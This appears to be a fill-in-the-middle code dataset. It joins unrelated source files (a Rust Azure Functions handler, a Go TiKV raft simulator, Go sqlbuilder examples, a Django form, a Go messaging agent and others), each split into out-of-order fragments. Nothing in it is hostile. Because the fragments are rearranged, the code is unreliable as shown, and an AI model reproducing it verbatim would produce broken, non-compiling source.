/// `{ azure_client_id: String, azure_client_secret: String, azure_tenant_id: String }` properties.
#[serde(flatten)]
azure_auth: azure::Auth,
/// The name of the Azure resource group that contains the Azure Log Analytics workspace.
#[serde(borrow)]
azure_log_analytics_workspace_resource_group_name: std::borrow::Cow<'a, str>,
/// The name of the Azure Log Analytics workspace.
#[serde(borrow)]
azure_log_analytics_workspace_name: std::borrow::Cow<'a, str>,
#[serde(flatten)]
rest: TSettings,
}
let LoggerSettings {
azure_subscription_id,
azure_auth,
azure_log_analytics_workspace_resource_group_name,
azure_log_analytics_workspace_name,
rest: settings,
} = serde_json::from_str(settings).context("could not read SECRET_SETTINGS env var")?;
Ok((
azure_subscription_id,
azure_auth,
azure_log_analytics_workspace_resource_group_name,
azure_log_analytics_workspace_name,
settings,
))
}
#[doc(hidden)]
pub async fn _log_sender<'a>(
azure_subscription_id: &'a str,
azure_log_analytics_workspace_resource_group_name: &'a str,
azure_log_analytics_workspace_name: &'a str,
azure_auth: &'a azure::Auth,
misc_logger: &'a log2::Logger,
) -> anyhow::Result<azure::management::log_analytics::LogSender<'a>> {
let log_sender =
azure::management::Client::new(
azure_subscription_id,
azure_log_analytics_workspace_resource_group_name,
azure_auth,
concat!("github.com/Arnavion/acme-azure-function ", env!("CARGO_PKG_NAME"), "/", env!("CARGO_PKG_VERSION"))
.parse().expect("hard-coded user agent is valid HeaderValue"),
misc_logger,
).context("could not initialize Azure Management API client")?
.log_analytics_log_sender(azure_log_analytics_workspace_name)
.await.context("could not create LogAnalytics log sender")?;
Ok(log_sender)
}
#[doc(hidden)]
pub async fn _next_stream(
incoming: &mut (impl futures_util::stream::Stream<Item = anyhow::Result<tokio::net::TcpStream>> + Unpin),
pending_requests: &mut (impl futures_util::stream::Stream<Item = anyhow::Result<()>> + Unpin),
misc_logger: &log2::Logger,
) -> Option<tokio::net::TcpStream> {
// FuturesUnordered repeatedly yields Poll::Ready(None) when it's empty, but we want to treat it like it yields Poll::Pending.
// So chain(stream::pending()) to it.
let mut pending_requests = futures_util::StreamExt::chain(pending_requests, futures_util::stream::pending());
loop {
let next = futures_util::future::try_select(futures_util::TryStreamExt::try_next(incoming), futures_util::TryStreamExt::try_next(&mut pending_requests));
match next.await {
Ok(futures_util::future::Either::Left((stream, _))) => break stream,
Ok(futures_util::future::Either::Right(_)) => (),
Err(err) => {
let (err, _) = err.factor_first();
misc_logger.report_error(&err);
},
}
}
}
#[allow(clippy::needless_lifetimes)] // TODO: https://github.com/rust-lang/rust-clippy/issues/5787
#[doc(hidden)]
pub async fn _parse_request<'a>(
stream: &mut (impl tokio::io::AsyncRead + Unpin),
mut buf: &'a mut tokio::io::ReadBuf<'_>,
) -> anyhow::Result<Option<(&'a str, &'a str, log2::Logger)>> {
if buf.remaining() == 0 {
return Err(anyhow::anyhow!("request headers too large"));
}
{
let previous_filled = buf.filled().len();
let () =
futures_util::future::poll_fn(|cx| tokio::io::AsyncRead::poll_read(std::pin::Pin::new(stream), cx, &mut buf))
.await.context("could not read request")?;
let new_filled = buf.filled().len();
if previous_filled == new_filled {
return Err(anyhow::anyhow!("malformed request: EOF"));
}
}
// TODO: Replace with `std::mem::MaybeUninit::uninit_array::<16>()` when that is stabilized.
let mut headers = unsafe { std::mem::MaybeUninit::<[std::mem::MaybeUninit<httparse::Header<'_>>; 16]>::uninit().assume_init() };
let mut req = httparse::Request::new(&mut []);
let body_start = match req.parse_with_uninit_headers(buf.filled(), &mut headers).context("malformed request")? {
httparse::Status::Complete(body_start) => body_start,
httparse::Status::Partial => return Ok(None),
};
let method = req.method.context("malformed request: no method")?;
let path =
req.path
.and_then(|path| path.strip_prefix('/'))
.context("malformed request: no path")?;
if req.version != Some(1) {
return Err(anyhow::anyhow!("malformed request: not HTTP/1.1"));
}
let mut function_invocation_id = None;
for &httparse::Header { name, value } in &*req.headers {
const X_AZURE_FUNCTIONS_INVOCATIONID: &str = "x-azure-functions-invocationid";
if name.eq_ignore_ascii_case("content-length") {
// We're able to send a response and close the connection without reading the request body,
// but FunctionHost doesn't like it and fails the function invocation because it wasn't able to write the request body
// in its entirety. So we need to drain the request body.
let content_length: usize =
std::str::from_utf8(value).context("malformed request: malformed content-length header")?
.parse().context("malformed request: malformed content-length header")?;
let mut remaining = content_length - (buf.filled().len() - body_start);
let mut buf = [std::mem::MaybeUninit::uninit(); 8192];
let mut buf = tokio::io::ReadBuf::uninit(&mut buf);
while remaining > 0 {
buf.clear();
let () =
futures_util::future::poll_fn(|cx| tokio::io::AsyncRead::poll_read(std::pin::Pin::new(stream), cx, &mut buf))
.await.context("could not read request body")?;
let read = buf.filled().len();
if read == 0 {
return Err(anyhow::anyhow!("malformed request: EOF"));
}
remaining = remaining.checked_sub(read).unwrap_or_default();
}
}
else if name.eq_ignore_ascii_case(X_AZURE_FUNCTIONS_INVOCATIONID) {
function_invocation_id = std::str::from_utf8(value).ok().map(ToOwned::to_owned);
}
}
let logger = log2::Logger::new(function_invocation_id, true);
Ok(Some((
method,
path,
logger,
)))
}
#[doc(hidden)]
pub async fn _handle_request(
method: &str,
path: &str,
logger: &log2::Logger,
log_sender: &azure::management::log_analytics::LogSender<'_>,
stream: &mut (impl tokio::io::AsyncWrite + Unpin),
res_f: impl std::future::Future<Output = anyhow::Result<Option<std::borrow::Cow<'static, str>>>>,
) -> anyhow::Result<()> {
fn make_log_sender<'a>(
logger: &'a log2::Logger,
log_sender: &'a azure::management::log_analytics::LogSender<'_>,
) -> (
tokio::sync::oneshot::Sender<()>,
impl std::future::Future<Output = anyhow::Result<()>> + 'a,
) {
let (stop_log_sender_tx, mut stop_log_sender_rx) = tokio::sync::oneshot::channel();
let log_sender_f = async move {
let mut push_timer = tokio::time::interval(std::time::Duration::from_secs(1));
push_timer.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
loop {
let push_timer_tick = push_timer.tick();
futures_util::pin_mut!(push_timer_tick);
let r = futures_util::future::select(push_timer_tick, stop_log_sender_rx).await;
let records = logger.take_records();
if !records.is_empty() {
#[allow(clippy::declare_interior_mutable_const)] // Clippy doesn't like const http::HeaderValue
const LOG_TYPE: http::HeaderValue = http::HeaderValue::from_static("FunctionAppLogs");
log_sender.send_logs(LOG_TYPE, records).await?;
}
match r {
futures_util::future::Either::Left((_, stop_log_sender_rx_)) => stop_log_sender_rx = stop_log_sender_rx_,
futures_util::future::Either::Right(_) => break Ok::<_, anyhow::Error>(()),
}
}
};
(stop_log_sender_tx, log_sender_f)
}
#[derive(Debug)]
enum Response {
Ok(std::borrow::Cow<'static, str>),
UnknownFunction,
MethodNotAllowed,
Error(String),
}
async fn write_response(stream: &mut (impl tokio::io::AsyncWrite + Unpin), res: &Response) -> anyhow::Result<()> {
let status = match res {
Response::Ok(_) => http::StatusCode::OK,
Response::UnknownFunction => http::StatusCode::NOT_FOUND,
Response::MethodNotAllowed => http::StatusCode::METHOD_NOT_ALLOWED,
Response::Error(_) => http::StatusCode::INTERNAL_SERVER_ERROR,
};
let mut io_slices = [
std::io::IoSlice::new(b"HTTP/1.1 "),
std::io::IoSlice::new(status.as_str().as_bytes()),
std::io::IoSlice::new(b" \r\n"),
std::io::IoSlice::new(b""), // headers
std::io::IoSlice::new(b"\r\n"),
std::io::IoSlice::new(b""), // body
];
match res {
Response::Ok(_) => {
io_slices[3] = std::io::IoSlice::new(b"content-type:application/json\r\n");
io_slices[5] = std::io::IoSlice::new(br#"{"Outputs":{"":""},"Logs":null,"ReturnValue":""}"#);
},
Response::UnknownFunction => (),
Response::MethodNotAllowed =>
io_slices[3] = std::io::IoSlice::new(b"allow:POST\r\n"),
Response::Error(err) => {
io_slices[3] = std::io::IoSlice::new(b"content-type:text/plain\r\n");
io_slices[5] = std::io::IoSlice::new(err.as_bytes());
},
}
let to_write: usize = io_slices.iter().map(|io_slice| io_slice.len()).sum();
let written = tokio::io::AsyncWriteExt::write_vectored(stream, &io_slices).await.context("could not write response")?;
if written != to_write {
// TODO:
//
// Our responses are short enough that writev is unlikely to do a short write, so this works in practice.
// But when `std::io::IoSlice::advance()` [1] becomes stable and tokio adds `AsyncWriteExt::write_all_vectored` [2],
// switch this to use that.
//
// [1]: https://github.com/rust-lang/rust/issues/62726
// [2]: https://github.com/tokio-rs/tokio/issues/3679
return Err(anyhow::anyhow!("could not write response: short write from writev ({}/{})", written, to_write));
}
let () = tokio::io::AsyncWriteExt::flush(stream).await.context("could not write response")?;
Ok(())
}
let res_f = async {
logger.report_state("function_invocation", "", format_args!("Request {{ method: {:?}, path: {:?} }}", method, path));
let res =
if method == "POST" {
match res_f.await {
Ok(Some(message)) => Response::Ok(message),
Ok(None) => Response::UnknownFunction,
Err(err) => Response::Error(format!("{:?}", err)),
}
}
else {
Response::MethodNotAllowed
};
logger.report_state("function_invocation", "", format_args!("Response {{ {:?} }}", res));
res
};
futures_util::pin_mut!(res_f);
let (stop_log_sender_tx, log_sender_f) = make_log_sender(logger, log_sender);
futures_util::pin_mut!(log_sender_f);
let res = match futures_util::future::select(res_f, log_sender_f).await {
futures_util::future::Either::Left((res, log_sender_f)) => {
let _ = stop_log_sender_tx.send(());
if let Err(err) = log_sender_f.await {
log::error!("{:?}", err.context("log sender failed"));
}
res
},
futures_util::future::Either::Right((Ok(()), _)) =>
unreachable!("log sender completed before scoped future"),
futures_util::future::Either::Right((Err(err), res_f)) => {
log::error!("{:?}", err.context("log sender failed"));
res_f.await
},
};
write_response(stream, &res).await?;
Ok(())
}
| {
if !self.enabled(record.metadata()) {
return;
}
let timestamp = chrono::Utc::now();
let level = record.level();
eprintln!("[{}] {:5} {}", timestamp.to_rfc3339_opts(chrono::SecondsFormat::Millis, true), level, record.args());
} |
index.ts | import keyBy from 'lodash/keyBy';
import { SelectColumnRenderer } from './renderer';
import { SelectConfig } from './type';
import { SelectColumnEditor } from './editor';
import * as loader from '@revolist/revo-dropdown/loader';
export default class SelectColumnType {
constructor() {
this.loadCustomComponent();
}
readonly editor = SelectColumnEditor;
beforeSetup = (col: SelectConfig) => {
if (!col.source) {
return;
}
col.sourceLookup = keyBy(col.source, col.valueKey);
}; | if (loader?.defineCustomElements) {
loader?.defineCustomElements();
}
}
}
export const CreateSelectColumnType = SelectColumnType; |
cellTemplate = SelectColumnRenderer;
private loadCustomComponent() { |
raft.go | // Copyright 2018 TiKV Project Authors.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package simulator
import (
"context"
"sync"
"github.com/pingcap/errors"
"github.com/pingcap/kvproto/pkg/metapb"
"github.com/tikv/pd/server/core"
"github.com/tikv/pd/tools/pd-simulator/simulator/cases"
"github.com/tikv/pd/tools/pd-simulator/simulator/simutil"
"go.uber.org/zap"
)
// RaftEngine records all raft information.
type RaftEngine struct {
sync.RWMutex
regionsInfo *core.RegionsInfo
conn *Connection
regionChange map[uint64][]uint64
schedulerStats *schedulerStatistics
regionSplitSize int64
regionSplitKeys int64
storeConfig *SimConfig
useTiDBEncodedKey bool
}
// NewRaftEngine creates the initialized raft with the configuration.
func NewRaftEngine(conf *cases.Case, conn *Connection, storeConfig *SimConfig) *RaftEngine {
r := &RaftEngine{
regionsInfo: core.NewRegionsInfo(),
conn: conn,
regionChange: make(map[uint64][]uint64),
schedulerStats: newSchedulerStatistics(),
regionSplitSize: conf.RegionSplitSize,
regionSplitKeys: conf.RegionSplitKeys,
storeConfig: storeConfig,
}
var splitKeys []string
if conf.TableNumber > 0 {
splitKeys = simutil.GenerateTableKeys(conf.TableNumber, len(conf.Regions)-1)
r.useTiDBEncodedKey = true
} else {
splitKeys = simutil.GenerateKeys(len(conf.Regions) - 1)
}
for i, region := range conf.Regions {
meta := &metapb.Region{
Id: region.ID,
Peers: region.Peers,
RegionEpoch: &metapb.RegionEpoch{ConfVer: 1, Version: 1},
}
if i > 0 {
meta.StartKey = []byte(splitKeys[i-1])
}
if i < len(conf.Regions)-1 {
meta.EndKey = []byte(splitKeys[i])
}
regionInfo := core.NewRegionInfo(
meta,
region.Leader,
core.SetApproximateSize(region.Size),
core.SetApproximateKeys(region.Keys),
)
r.SetRegion(regionInfo)
peers := region.Peers
regionSize := uint64(region.Size)
for _, peer := range peers {
r.conn.Nodes[peer.StoreId].incUsedSize(regionSize)
}
}
for _, node := range conn.Nodes {
node.raftEngine = r
}
return r
}
func (r *RaftEngine) stepRegions() {
regions := r.GetRegions()
for _, region := range regions {
r.stepLeader(region)
r.stepSplit(region)
}
}
func (r *RaftEngine) stepLeader(region *core.RegionInfo) {
if region.GetLeader() != nil && r.conn.nodeHealth(region.GetLeader().GetStoreId()) {
return
}
newLeader := r.electNewLeader(region)
newRegion := region.Clone(core.WithLeader(newLeader))
if newLeader == nil {
r.SetRegion(newRegion)
simutil.Logger.Info("region has no leader", zap.Uint64("region-id", region.GetID()))
return
}
simutil.Logger.Info("region elects a new leader",
zap.Uint64("region-id", region.GetID()),
zap.Reflect("new-leader", newLeader),
zap.Reflect("old-leader", region.GetLeader()))
r.SetRegion(newRegion)
r.recordRegionChange(newRegion)
}
func (r *RaftEngine) stepSplit(region *core.RegionInfo) {
if region.GetLeader() == nil {
return
}
if !r.NeedSplit(region.GetApproximateSize(), region.GetApproximateKeys()) {
return
}
var err error
ids := make([]uint64, 1+len(region.GetPeers()))
for i := range ids {
ids[i], err = r.allocID(region.GetLeader().GetStoreId())
if err != nil {
simutil.Logger.Error("alloc id failed", zap.Error(err))
return
}
}
var splitKey []byte
if r.useTiDBEncodedKey {
splitKey, err = simutil.GenerateTiDBEncodedSplitKey(region.GetStartKey(), region.GetEndKey())
if err != nil {
simutil.Logger.Fatal("generate TiDB encoded split key failed", zap.Error(err))
}
} else {
splitKey = simutil.GenerateSplitKey(region.GetStartKey(), region.GetEndKey())
}
left := region.Clone(
core.WithNewRegionID(ids[len(ids)-1]),
core.WithNewPeerIds(ids[0:len(ids)-1]...),
core.WithIncVersion(),
core.SetApproximateKeys(region.GetApproximateKeys()/2),
core.SetApproximateSize(region.GetApproximateSize()/2),
core.WithPendingPeers(nil),
core.WithDownPeers(nil),
core.WithEndKey(splitKey),
)
right := region.Clone(
core.WithIncVersion(),
core.SetApproximateKeys(region.GetApproximateKeys()/2),
core.SetApproximateSize(region.GetApproximateSize()/2),
core.WithStartKey(splitKey),
)
r.SetRegion(right)
r.SetRegion(left)
simutil.Logger.Debug("region split",
zap.Uint64("region-id", region.GetID()),
zap.Reflect("origin", region.GetMeta()),
zap.Reflect("left", left.GetMeta()),
zap.Reflect("right", right.GetMeta()))
r.recordRegionChange(left)
r.recordRegionChange(right)
}
// NeedSplit checks whether the region needs to split according its size
// and number of keys.
func (r *RaftEngine) NeedSplit(size, rows int64) bool {
if r.regionSplitSize != 0 && size >= r.regionSplitSize {
return true
}
if r.regionSplitKeys != 0 && rows >= r.regionSplitKeys {
return true
}
return false
}
func (r *RaftEngine) recordRegionChange(region *core.RegionInfo) {
r.Lock()
defer r.Unlock()
n := region.GetLeader().GetStoreId()
r.regionChange[n] = append(r.regionChange[n], region.GetID())
}
func (r *RaftEngine) updateRegionStore(region *core.RegionInfo, size int64) {
newRegion := region.Clone(
core.SetApproximateSize(region.GetApproximateSize()+size),
core.SetWrittenBytes(uint64(size)),
)
storeIDs := region.GetStoreIds()
for storeID := range storeIDs {
r.conn.Nodes[storeID].incUsedSize(uint64(size))
}
r.SetRegion(newRegion)
}
func (r *RaftEngine) updateRegionReadBytes(readBytes map[uint64]int64) {
for id, bytes := range readBytes {
region := r.GetRegion(id)
if region == nil {
simutil.Logger.Error("region is not found", zap.Uint64("region-id", id))
continue
}
newRegion := region.Clone(core.SetReadBytes(uint64(bytes)))
r.SetRegion(newRegion)
}
}
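// electNewLeader picks a peer on an arbitrary healthy store, but only while a
// majority of the region's stores are healthy; e.g. with 3 replicas, at most
// 1 store may be unhealthy for a new leader to be chosen.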
func (r *RaftEngine) electNewLeader(region *core.RegionInfo) *metapb.Peer {
var (
unhealthy int
newLeaderStoreID uint64
)
ids := region.GetStoreIds()
for id := range ids {
if r.conn.nodeHealth(id) {
newLeaderStoreID = id
} else {
unhealthy++
}
}
if unhealthy > len(ids)/2 {
return nil
}
for _, peer := range region.GetPeers() {
if peer.GetStoreId() == newLeaderStoreID {
return peer
}
}
return nil
}
// GetRegion returns the RegionInfo with regionID.
func (r *RaftEngine) GetRegion(regionID uint64) *core.RegionInfo {
r.RLock()
defer r.RUnlock() | func (r *RaftEngine) GetRegionChange(storeID uint64) []uint64 {
r.RLock()
defer r.RUnlock()
return r.regionChange[storeID]
}
// ResetRegionChange resets RegionInfo on a specific store with a given Region ID
func (r *RaftEngine) ResetRegionChange(storeID uint64, regionID uint64) {
r.Lock()
defer r.Unlock()
regionIDs := r.regionChange[storeID]
for i, id := range regionIDs {
if id == regionID {
r.regionChange[storeID] = append(r.regionChange[storeID][:i], r.regionChange[storeID][i+1:]...)
return
}
}
}
// GetRegions gets all RegionInfo from regionMap
func (r *RaftEngine) GetRegions() []*core.RegionInfo {
r.RLock()
defer r.RUnlock()
return r.regionsInfo.GetRegions()
}
// SetRegion sets the RegionInfo with regionID
func (r *RaftEngine) SetRegion(region *core.RegionInfo) []*core.RegionInfo {
r.Lock()
defer r.Unlock()
return r.regionsInfo.SetRegion(region)
}
// GetRegionByKey searches the RegionInfo from regionTree
func (r *RaftEngine) GetRegionByKey(regionKey []byte) *core.RegionInfo {
r.RLock()
defer r.RUnlock()
return r.regionsInfo.GetRegionByKey(regionKey)
}
// BootstrapRegion gets a region to construct bootstrap info.
func (r *RaftEngine) BootstrapRegion() *core.RegionInfo {
r.RLock()
defer r.RUnlock()
regions := r.regionsInfo.ScanRange(nil, nil, 1)
if len(regions) > 0 {
return regions[0]
}
return nil
}
func (r *RaftEngine) allocID(storeID uint64) (uint64, error) {
node, ok := r.conn.Nodes[storeID]
if !ok {
return 0, errors.Errorf("node %d not found", storeID)
}
id, err := node.client.AllocID(context.Background())
return id, errors.WithStack(err)
} | return r.regionsInfo.GetRegion(regionID)
}
// GetRegionChange returns a list of RegionID for a given store. |
inspect.py | import datetime
import copy
import pprint
from .base import CommandBase
from akebono.inspector import get_scenario_summary
def _get_fixed_length_str(s, length):
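    # Essentially s.ljust(length), plus validation: non-str input and strings
    # longer than the target length are rejected.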
if not isinstance(s, str):
raise TypeError('invalid type')
l = length - len(s)
if l < 0:
raise Exception('invalid length')
return s + (' ' * l)
class Inspect(CommandBase):
def apply_arguments(self, parser):
parser.add_argument('-c', '--config', default='config')
parser.add_argument('-t', '--scenario-tag', default='default')
parser.add_argument('-k', '--performance-sort-key', default=None)
parser.add_argument('-v', '--verbose', action='store_true', default=False)
def execute(self, namespace):
| ss = get_scenario_summary(namespace.scenario_tag, namespace.performance_sort_key)
print('=== scenario summary .. tag: {} ==='.format(namespace.scenario_tag))
for idx, row in ss.iterrows():
print('')
print('------------------------------------------------------------')
train_id = row['_akebono_train']['id']
print('train_id: {}'.format(train_id))
print('')
if namespace.verbose:
pprint.pprint(row['_akebono_train'])
print('')
attrs = list(row.index.copy())
attrs.remove('_akebono_train')
alen = max([len(a) for a in attrs] + [8])
v1 = ' '.join([_get_fixed_length_str(a, alen) for a in attrs])
v2 = ' '.join([_get_fixed_length_str('{:.5f}'.format(row[a]), alen) for a in attrs])
print(v1)
print(v2)
print('') |
|
blocksigs_test.go | package blockdb
import (
"testing"
"github.com/boltdb/bolt"
"github.com/stretchr/testify/require"
"github.com/spo-next/spo/src/cipher"
"github.com/spo-next/spo/src/cipher/encoder"
"github.com/spo-next/spo/src/testutil"
)
func TestNewBlockSigs(t *testing.T) |
func TestBlockSigsGet(t *testing.T) {
type hashSig struct {
hash cipher.SHA256
sig cipher.Sig
}
type expect struct {
exist bool
sig cipher.Sig
err error
}
hashSigs := []hashSig{}
for i := 0; i < 5; i++ {
_, s := cipher.GenerateKeyPair()
h := testutil.RandSHA256(t)
sig := cipher.SignHash(h, s)
hashSigs = append(hashSigs, hashSig{
hash: h,
sig: sig,
})
}
tt := []struct {
name string
init []hashSig
hash cipher.SHA256
expect expect
}{
{
"ok",
hashSigs[:],
hashSigs[0].hash,
expect{
true,
hashSigs[0].sig,
nil,
},
},
{
"not exist",
hashSigs[1:],
hashSigs[0].hash,
expect{
false,
cipher.Sig{},
nil,
},
},
}
for _, tc := range tt {
t.Run(tc.name, func(t *testing.T) {
db, closeDB := testutil.PrepareDB(t)
defer closeDB()
// init db
db.Update(func(tx *bolt.Tx) error {
bkt, err := tx.CreateBucketIfNotExists(blockSigsBkt)
require.NoError(t, err)
for _, hs := range tc.init {
err = bkt.Put(hs.hash[:], encoder.Serialize(hs.sig))
require.NoError(t, err)
}
return nil
})
sigs, err := newBlockSigs(db)
require.NoError(t, err)
sg, ok, err := sigs.Get(tc.hash)
require.Equal(t, tc.expect.err, err)
require.Equal(t, tc.expect.exist, ok)
if ok {
require.Equal(t, tc.expect.sig, sg)
}
})
}
}
func TestBlockSigsAddWithTx(t *testing.T) {
db, closeDB := testutil.PrepareDB(t)
defer closeDB()
_, s := cipher.GenerateKeyPair()
h := testutil.RandSHA256(t)
sig := cipher.SignHash(h, s)
sigs, err := newBlockSigs(db)
require.NoError(t, err)
db.Update(func(tx *bolt.Tx) error {
return sigs.AddWithTx(tx, h, sig)
})
// check the db
db.View(func(tx *bolt.Tx) error {
bkt := tx.Bucket(blockSigsBkt)
v := bkt.Get(h[:])
require.NotNil(t, v)
var s cipher.Sig
err := encoder.DeserializeRaw(v, &s)
require.NoError(t, err)
require.Equal(t, sig, s)
return nil
})
}
| {
db, closeDB := testutil.PrepareDB(t)
defer closeDB()
sigs, err := newBlockSigs(db)
require.NoError(t, err)
require.NotNil(t, sigs)
// check the bucket
require.NotNil(t, sigs.Sigs)
db.View(func(tx *bolt.Tx) error {
bkt := tx.Bucket(blockSigsBkt)
require.NotNil(t, bkt)
return nil
})
} |
select_test.go | // Copyright 2018 Huan Du. All rights reserved.
// Licensed under the MIT license that can be found in the LICENSE file.
package sqlbuilder
import (
"database/sql"
"fmt"
)
func ExampleSelectBuilder() {
sb := NewSelectBuilder()
sb.Distinct().Select("id", "name", sb.As("COUNT(*)", "t"))
sb.From("demo.user")
sb.Where(
sb.GreaterThan("id", 1234),
sb.Like("name", "%Du"),
sb.Or(
sb.IsNull("id_card"),
sb.In("status", 1, 2, 5),
),
sb.NotIn(
"id",
NewSelectBuilder().Select("id").From("banned"),
), // Nested SELECT. | "modified_at > created_at + "+sb.Var(86400), // It's allowed to write arbitrary SQL.
)
sb.GroupBy("status").Having(sb.NotIn("status", 4, 5))
sb.OrderBy("modified_at").Asc()
sb.Limit(10).Offset(5)
sql, args := sb.Build()
fmt.Println(sql)
fmt.Println(args)
// Output:
// SELECT DISTINCT id, name, COUNT(*) AS t FROM demo.user WHERE id > ? AND name LIKE ? AND (id_card IS NULL OR status IN (?, ?, ?)) AND id NOT IN (SELECT id FROM banned) AND modified_at > created_at + ? GROUP BY status HAVING status NOT IN (?, ?) ORDER BY modified_at ASC LIMIT 10 OFFSET 5
// [1234 %Du 1 2 5 86400 4 5]
}
func ExampleSelectBuilder_advancedUsage() {
sb := NewSelectBuilder()
innerSb := NewSelectBuilder()
sb.Select("id", "name")
sb.From(
sb.BuilderAs(innerSb, "user"),
)
sb.Where(
sb.In("status", Flatten([]int{1, 2, 3})...),
sb.Between("created_at", sql.Named("start", 1234567890), sql.Named("end", 1234599999)),
)
sb.OrderBy("modified_at").Desc()
innerSb.Select("*")
innerSb.From("banned")
innerSb.Where(
innerSb.NotIn("name", Flatten([]string{"Huan Du", "Charmy Liu"})...),
)
sql, args := sb.Build()
fmt.Println(sql)
fmt.Println(args)
// Output:
// SELECT id, name FROM (SELECT * FROM banned WHERE name NOT IN (?, ?)) AS user WHERE status IN (?, ?, ?) AND created_at BETWEEN @start AND @end ORDER BY modified_at DESC
// [Huan Du Charmy Liu 1 2 3 {{} start 1234567890} {{} end 1234599999}]
}
func ExampleSelectBuilder_join() {
sb := NewSelectBuilder()
sb.Select("u.id", "u.name", "c.type", "p.nickname")
sb.From("user u")
sb.Join("contract c",
"u.id = c.user_id",
sb.In("c.status", 1, 2, 5),
)
sb.JoinWithOption(RightOuterJoin, "person p",
"u.id = p.user_id",
sb.Like("p.surname", "%Du"),
)
sb.Where(
"u.modified_at > u.created_at + " + sb.Var(86400), // It's allowed to write arbitrary SQL.
)
sql, args := sb.Build()
fmt.Println(sql)
fmt.Println(args)
// Output:
// SELECT u.id, u.name, c.type, p.nickname FROM user u JOIN contract c ON u.id = c.user_id AND c.status IN (?, ?, ?) RIGHT OUTER JOIN person p ON u.id = p.user_id AND p.surname LIKE ? WHERE u.modified_at > u.created_at + ?
// [1 2 5 %Du 86400]
} | |
forms.py | from django import forms
from django.forms import ModelForm
| fields='__all__' | from .models import *
class TodoForm(forms.ModelForm):
class Meta:
model=Todo
|
mod.rs | /*!
Private extensions for `Stream` for collecting
keys, values, and sequences that are known upfront.
This is useful for `serde` integration where we can avoid
allocating for nested data structures that are already known.
*/
use crate::stream::{
self,
Stream,
};
mod owned;
mod value;
#[doc(inline)]
pub use crate::Error;
pub(crate) use self::{
owned::{
OwnedCollect,
RefMutCollect,
},
value::Value,
};
// FIXME: Moving the `*_collect` methods onto the base `Stream`
// trait is a little more efficient (a few % improvement against `serde`)
// in the general case because it can save a virtual call per key/value/elem.
// The reason this hasn't been done already is just to reduce
// the API surface area for now. It should be revisited sometime.
// The `Value` type that's passed in would need some more attention.
/**
An extension to `Stream` for items that are known upfront.
*/
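// e.g. the `Default` impl below defines `map_key_collect(k)` as `map_key()`
// followed by `k.stream(self)`; specialized implementations can take a
// faster path for values that are already known.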
pub(crate) trait Collect: Stream {
fn map_key_collect(&mut self, k: Value) -> Result;
fn map_value_collect(&mut self, v: Value) -> Result;
fn seq_elem_collect(&mut self, v: Value) -> Result;
}
impl<'a, S: ?Sized> Collect for &'a mut S
where
S: Collect,
{
#[inline]
fn map_key_collect(&mut self, k: Value) -> Result {
(**self).map_key_collect(k)
}
#[inline]
fn map_value_collect(&mut self, v: Value) -> Result {
(**self).map_value_collect(v)
}
#[inline]
fn | (&mut self, v: Value) -> Result {
(**self).seq_elem_collect(v)
}
}
/**
Default implementations for stream extensions.
*/
pub(crate) struct Default<S>(pub(crate) S);
impl<S> Collect for Default<S>
where
S: Stream,
{
#[inline]
fn map_key_collect(&mut self, k: Value) -> Result {
Stream::map_key(self)?;
k.stream(self)
}
#[inline]
fn map_value_collect(&mut self, v: Value) -> Result {
Stream::map_value(self)?;
v.stream(self)
}
#[inline]
fn seq_elem_collect(&mut self, v: Value) -> Result {
Stream::seq_elem(self)?;
v.stream(self)
}
}
impl<S> Stream for Default<S>
where
S: Stream,
{
#[inline]
fn fmt(&mut self, args: stream::Arguments) -> Result {
self.0.fmt(args)
}
#[inline]
fn i64(&mut self, v: i64) -> Result {
self.0.i64(v)
}
#[inline]
fn u64(&mut self, v: u64) -> Result {
self.0.u64(v)
}
#[inline]
fn i128(&mut self, v: i128) -> Result {
self.0.i128(v)
}
#[inline]
fn u128(&mut self, v: u128) -> Result {
self.0.u128(v)
}
#[inline]
fn f64(&mut self, v: f64) -> Result {
self.0.f64(v)
}
#[inline]
fn bool(&mut self, v: bool) -> Result {
self.0.bool(v)
}
#[inline]
fn char(&mut self, v: char) -> Result {
self.0.char(v)
}
#[inline]
fn str(&mut self, v: &str) -> Result {
self.0.str(v)
}
#[inline]
fn none(&mut self) -> Result {
self.0.none()
}
#[inline]
fn map_begin(&mut self, len: Option<usize>) -> Result {
self.0.map_begin(len)
}
#[inline]
fn map_key(&mut self) -> Result {
self.0.map_key()
}
#[inline]
fn map_value(&mut self) -> Result {
self.0.map_value()
}
#[inline]
fn map_end(&mut self) -> Result {
self.0.map_end()
}
#[inline]
fn seq_begin(&mut self, len: Option<usize>) -> Result {
self.0.seq_begin(len)
}
#[inline]
fn seq_elem(&mut self) -> Result {
self.0.seq_elem()
}
#[inline]
fn seq_end(&mut self) -> Result {
self.0.seq_end()
}
}
pub type Result = crate::std::result::Result<(), Error>;
| seq_elem_collect |
agent.go |
package main
// ---------------------------------------------------------------------------------------------------------------------
import "bytes"
import "encoding/json"
import "fmt"
import "github.com/streadway/amqp"
import "io/ioutil"
import "log"
import "net"
import "net/http"
import "os"
import "strings"
// ---------------------------------------------------------------------------------------------------------------------
const CONFIGURATION_FILE string = "config.json"
var ipAddress string
// ---------------------------------------------------------------------------------------------------------------------
func failOnError(err error, msg string) {
if err != nil {
log.Fatalf("%s: %s", msg, err)
panic(fmt.Sprintf("%s: %s", msg, err))
}
}
// ---------------------------------------------------------------------------------------------------------------------
type Configuration struct {
Controller string
MqConnString string
}
// ---------------------------------------------------------------------------------------------------------------------
type OperationRequest struct {
Operation uint8
FilePath string
Term string
}
// ---------------------------------------------------------------------------------------------------------------------
type OperationMessage struct {
Request OperationRequest
Uuid string
}
// ---------------------------------------------------------------------------------------------------------------------
type OperationReply struct {
State bool
Uuid string
IpAddress string
}
// ---------------------------------------------------------------------------------------------------------------------
func reply(controller string, uuid string, state bool) {
operationReply := OperationReply {
State : state,
Uuid : uuid,
IpAddress : ipAddress,
}
messageBytes, err := json.Marshal(operationReply)
if err != nil {
log.Println("Seialization error")
return
}
	resp, err := http.Post("http://" + controller + "/reply", "application/json", bytes.NewBuffer(messageBytes))
	if err != nil {
		log.Println("Cannot send reply")
		return
	}
	defer resp.Body.Close()
	if resp.StatusCode != 200 {
